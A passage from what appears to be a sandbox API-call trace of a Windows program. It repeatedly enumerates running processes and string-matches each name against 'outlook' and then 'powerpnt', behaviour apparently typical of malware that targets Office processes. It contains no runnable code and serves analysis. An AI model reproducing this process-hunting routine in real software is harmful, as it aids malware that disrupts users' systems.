lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0098.812] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357a3f8 [0098.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357a3f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0098.812] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0098.812] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="outlook") returned 0x0 [0098.813] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0098.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.814] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a478 [0098.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357a478, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0098.814] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0098.814] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="outlook") returned 0x0 [0098.814] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0098.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.815] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b988 [0098.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356b988, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0098.815] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0098.815] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="outlook") returned 0x0 [0098.815] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0098.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.817] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35788b8 [0098.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35788b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.817] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0098.817] StrStrIA (lpFirst="conhost.exe", lpSrch="outlook") returned 0x0 [0098.817] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0098.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.818] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578900 [0098.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3578900, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.818] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0098.818] StrStrIA (lpFirst="conhost.exe", lpSrch="outlook") returned 0x0 [0098.818] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0098.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.820] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578a08 [0098.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3578a08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0098.820] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0098.820] StrStrIA (lpFirst="rxodge.exe", lpSrch="outlook") returned 0x0 [0098.820] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0098.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.821] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578bb8 [0098.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3578bb8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0098.821] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0098.821] StrStrIA (lpFirst="sppsvc.exe", lpSrch="outlook") returned 0x0 [0098.821] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0098.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.822] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a2f8 [0098.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357a2f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0098.822] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0098.822] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="outlook") returned 0x0 [0098.822] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0098.823] CloseHandle (hObject=0x358) returned 1 [0098.823] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0098.855] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.857] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a098 [0098.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357a098, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0098.857] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0098.857] StrStrIA (lpFirst="[System Process]", lpSrch="powerpnt") returned 0x0 [0098.857] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0098.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0098.858] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574f50 [0098.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574f50, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0098.858] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0098.858] StrStrIA (lpFirst="System", lpSrch="powerpnt") returned 0x0 [0098.858] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0098.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.860] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578a20 [0098.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3578a20, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0098.860] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0098.860] StrStrIA (lpFirst="smss.exe", lpSrch="powerpnt") returned 0x0 [0098.860] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0098.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.861] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578c90 [0098.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3578c90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0098.861] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0098.861] StrStrIA (lpFirst="csrss.exe", lpSrch="powerpnt") returned 0x0 [0098.861] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0098.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.863] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578a38 [0098.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3578a38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0098.863] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0098.863] StrStrIA (lpFirst="wininit.exe", lpSrch="powerpnt") returned 0x0 [0098.863] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0098.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.864] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578ba0 [0098.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3578ba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0098.864] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0098.864] StrStrIA (lpFirst="csrss.exe", lpSrch="powerpnt") returned 0x0 [0098.864] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0098.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.865] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578b58 [0098.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3578b58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0098.865] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0098.865] StrStrIA (lpFirst="winlogon.exe", lpSrch="powerpnt") returned 0x0 [0098.866] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0098.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.867] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578c48 [0098.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3578c48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0098.867] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0098.867] StrStrIA (lpFirst="services.exe", lpSrch="powerpnt") returned 0x0 [0098.867] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0098.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.868] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578c60 [0098.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3578c60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0098.868] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0098.868] StrStrIA (lpFirst="lsass.exe", lpSrch="powerpnt") returned 0x0 [0098.868] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.869] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578a50 [0098.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578a50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.869] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.870] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.870] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0098.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.871] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35789a8 [0098.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35789a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0098.871] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0098.871] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="powerpnt") returned 0x0 [0098.871] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0098.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.872] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3578c78 [0098.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3578c78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0098.872] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0098.872] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="powerpnt") returned 0x0 [0098.872] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.873] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578af8 [0098.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578af8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.874] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.874] StrStrIA (lpFirst="svchost.exe", lpSrch="powerpnt") returned 0x0 [0098.874] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0098.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0098.875] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3575010 [0098.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3575010, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0098.875] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0098.875] StrStrIA (lpFirst="dwm.exe", lpSrch="powerpnt") returned 0x0 [0098.875] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.876] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35789c0 [0098.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35789c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.876] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.876] 